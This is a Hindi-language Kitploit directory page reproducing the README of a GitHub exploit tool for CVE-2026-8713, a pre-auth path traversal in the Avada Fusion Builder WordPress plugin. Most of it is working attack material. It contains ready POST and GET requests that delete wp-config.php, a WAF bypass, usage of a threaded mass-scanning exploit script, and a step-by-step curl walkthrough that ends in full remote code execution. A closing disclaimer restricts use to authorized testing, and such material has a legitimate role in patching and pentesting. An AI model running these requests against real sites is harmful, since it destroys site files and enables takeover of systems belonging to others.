Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-8713 — Avada (Fusion) Builder <= 3.15.3 में प्री-ऑथ पाथ ट्रैवर्सल से मनमानी फ़ाइल विलोपन, जिससे RCE (CVSS 9.1) उत्पन्न होता है | Kitploit
उपकरण/GitHubGitHub/shinthink/cve-2026-8713
भेद्यता स्कैनरभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणWAF बाईपासवेब सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubshinthink/cve-2026-8713

CVE-2026-8713

Avada (Fusion) Builder <= 3.15.3 में प्री-ऑथ पाथ ट्रैवर्सल से मनमानी फ़ाइल विलोपन, जिससे RCE (CVSS 9.1) उत्पन्न होता है

रिपॉजिटरी देखें
41 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-8713 — Avada (Fusion) Builder WordPress एक्सप्लॉइट

प्री-ऑथ पाथ ट्रैवर्सल → मनमाना फ़ाइल विलोपन → बलपूर्वक पुनर्स्थापना → RCE


अवलोकन

CVE-2026-8713 WordPress के लिए Avada (Fusion) Builder प्लगइन/थीम में एक CVSS 9.1 क्रिटिकल भेद्यता है। Fusion_Form_DB_Entries क्लास में maybe_delete_files() फ़ंक्शन, हमलावर-नियंत्रित फॉर्म एंट्री मानों से सरल स्ट्रिंग प्रतिस्थापन का उपयोग करके फ़ाइलसिस्टम पथ बनाता है — बिना realpath() सत्यापन या निर्देशिका कंटेनमेंट जाँच के।

एक बिना प्रमाणीकरण वाला हमलावर fusion_form_submit_ajax हैंडलर के माध्यम से पाथ ट्रैवर्सल पेलोड सबमिट करता है। जब Fusion_Form_DB_Privacy शटडाउन हुक privacy_expiration_action=delete के साथ एंट्री को प्रोसेस करता है, तो लक्षित फ़ाइल सर्वर से हटा दी जाती है।

प्रभावित संस्करण

संस्करणस्थिति
Fusion Builder ≤ 3.15.3असुरक्षित
Fusion Builder ≥ 3.15.4पैच किया गया
Avada थीम (सभी)बंडल प्लगइन असुरक्षित हो सकता है

नोट: Avada थीम संस्करण (7.x), Fusion Builder प्लगइन संस्करण (3.x) से भिन्न है। भेद्यता प्लगइन में है, लेकिन स्कैनर दोनों का पता लगाता है।


भेद्यता तंत्र

मूल कारण

fusion-builder/inc/class-fusion-form-db-entries.php में, maybe_delete_files() विधि बिना कंटेनमेंट सत्यापन के स्ट्रिंग प्रतिस्थापन का उपयोग करके फ़ाइल पथों को हल करती है:

root@kitploit:~
$file_path = str_replace($upload['url'], $upload['path'], $value);
// No realpath() check — path traversal sequences pass through
unlink($file_path);

हमला श्रृंखला

root@kitploit:~
1. Attacker submits Avada form via wp_ajax_nopriv_fusion_form_submit_ajax
   → Path traversal: ../../wp-config.php
   → privacy_expiration_action = delete
   → privacy_expiration_interval = 0

2. WordPress shutdown hook fires Fusion_Form_DB_Privacy
   → Processes stored form entry
   → Calls maybe_delete_files() on attacker-controlled path
   → wp-config.php deleted

3. WordPress enters setup/install mode
   → Attacker connects site to malicious database
   → Full remote code execution

बिना प्रमाणीकरण पहुँच

AJAX हैंडलर wp_ajax_nopriv_ के साथ पंजीकृत है, जो इसे बिना प्रमाणीकरण वाले उपयोगकर्ताओं के लिए सुलभ बनाता है:

root@kitploit:~
POST /wp-admin/admin-ajax.php
  action=fusion_form_submit_ajax
  form_id=<id>
  privacy_expiration_action=delete
  fusion_privacy_expiration_interval=0
  fusion_form_field_<name>=../../wp-config.php

WAF बाईपास

कई होस्ट /wp-admin/admin-ajax.php पर POST को ब्लॉक करते हैं। WordPress इस एंडपॉइंट पर GET के माध्यम से पैरामीटर स्वीकार करता है, जो एक सरल बाईपास प्रदान करता है:

root@kitploit:~
GET /wp-admin/admin-ajax.php?action=fusion_form_submit_ajax&form_id=<id>&privacy_expiration_action=delete&...

स्थापना

root@kitploit:~
git clone https://github.com/shinthink/CVE-2026-8713.git
cd CVE-2026-8713
pip install -r requirements.txt

उपयोग

root@kitploit:~
# Detection only (default — no file deletion)
python cve_2026_8713.py -t target.com

# Mass detection
python cve_2026_8713.py -f targets.txt

# Exploit mode — delete wp-config.php
python cve_2026_8713.py -t target.com --exploit

# Delete custom file
python cve_2026_8713.py -t target.com --exploit --delete "../../../debug.log"

तर्क

root@kitploit:~
  -t, --target      Single target (domain or IP)
  -f, --file        Target list, one per line
  --exploit         Enable file deletion (default: detection only)
  --delete PATH     Custom file path to delete (default: wp-config.php)
  -o, --output      Save results to file
  --threads         Workers (default: 20)
  -v, --verbose     Show detailed output

संकल्पना का प्रमाण

पहचान मोड

root@kitploit:~
$ python cve_2026_8713.py -f targets.txt
root@kitploit:~
  CVE-2026-8713  Avada (Fusion) Builder  |  CVSS 9.1
  Mode: Detection  |  Targets: 521  |  Workers: 20
  ───────────────────────────────────────────────────────

  [EXPLOIT]  target-vuln.com      1.2s  form #3  (AJAX open)
  [VULN]     target-waf.com       2.1s  form #1  (WAF blocked)
  [AVADA]    target-noform.com    0.5s  (no form found)
  [-]        target-noavada.com   0.3s

  ───────────────────────────────────────────────────────
  Scan complete  |  Time: 45s
  ───────────────────────────────────────────────────────
  Targets        : 521
  Avada detected : 47
  Forms found    : 12
  Vulnerable     : 9

एक्सप्लॉइट मोड

root@kitploit:~
$ python cve_2026_8713.py -t target.com --exploit -v
root@kitploit:~
  CVE-2026-8713 — Avada Builder Exploit
  CVSS 9.1 | Pre-Auth | Path Traversal → File Delete → RCE

    [+] Found Avada form: id=3
    [+] POST form_id=3: HTTP 403 (WAF blocked)
    [+] GET form_id=3: HTTP 200 (WAF bypassed)

  Host     : target.com
  Avada    : YES
  Form     : 3
  Deleted  : wp-config.php (force reinstall → RCE)
  Time     : 3.2s

मैन्युअल एक्सप्लॉइटेशन

चरण 1 — Avada सत्यापित करें

root@kitploit:~
curl -sk 'https://target.com/wp-content/themes/Avada/style.css' | head -5

चरण 2 — फॉर्म ID खोजें

root@kitploit:~
curl -sk 'https://target.com/' | grep -oP 'fusion-form[^"]*form-id=["\x27](https://github.com/shinthink/cve-2026-8713/blob/HEAD/%5Cd+)'

चरण 3 — पाथ ट्रैवर्सल के साथ फॉर्म सबमिट करें

root@kitploit:~
curl -sk -X POST \
  -d 'action=fusion_form_submit_ajax' \
  -d 'form_id=3' \
  -d 'privacy_expiration_action=delete' \
  -d 'fusion_privacy_expiration_interval=0' \
  -d 'fusion_form_field_x=../../wp-config.php' \
  'https://target.com/wp-admin/admin-ajax.php'

चरण 4 — WAF बाईपास (यदि POST ब्लॉक है)

root@kitploit:~
curl -sk 'https://target.com/wp-admin/admin-ajax.php?action=fusion_form_submit_ajax&form_id=3&privacy_expiration_action=delete&fusion_privacy_expiration_interval=0&fusion_form_field_x=../../wp-config.php'

चरण 5 — RCE सत्यापित करें और एक्सप्लॉइट करें

root@kitploit:~
# Site in install mode?
curl -sk -o /dev/null -w '%{http_code}' 'https://target.com/wp-admin/install.php'
# HTTP 200 → wp-config deleted → connect malicious DB → full RCE

अस्वीकरण

केवल शैक्षिक और अधिकृत परीक्षण प्रयोजनों के लिए।

यह सॉफ़्टवेयर अधिकृत पेनेट्रेशन परीक्षण करने वाले सुरक्षा पेशेवरों, अपने स्वयं के बुनियादी ढांचे का ऑडिट करने वाले संगठनों, और भेद्यता शोषण का अध्ययन करने वाले शोधकर्ताओं के लिए है।

कंप्यूटर सिस्टम तक अनधिकृत पहुँच अवैध है और निम्नलिखित का उल्लंघन कर सकती है:

  • संयुक्त राज्य अमेरिका: Computer Fraud and Abuse Act (18 U.S.C. 1030)
  • इंडोनेशिया: UU ITE Pasal 30 & 46
  • यूरोपीय संघ: Directive 2013/40/EU
  • यूनाइटेड किंगडम: Computer Misuse Act 1990

लेखक दुरुपयोग के लिए कोई दायित्व नहीं लेते हैं।


संदर्भ


यह प्रोजेक्ट ThemeFusion या Avada से संबद्ध नहीं है।

टूल डाउनलोड करें
संसाधनलिंक
IONIX परामर्शionix.io/threat-center/cve-2026-8713
Wordfence परामर्शwordfence.com
Patchstackpatchstack.com
NVD प्रविष्टिCVE-2026-8713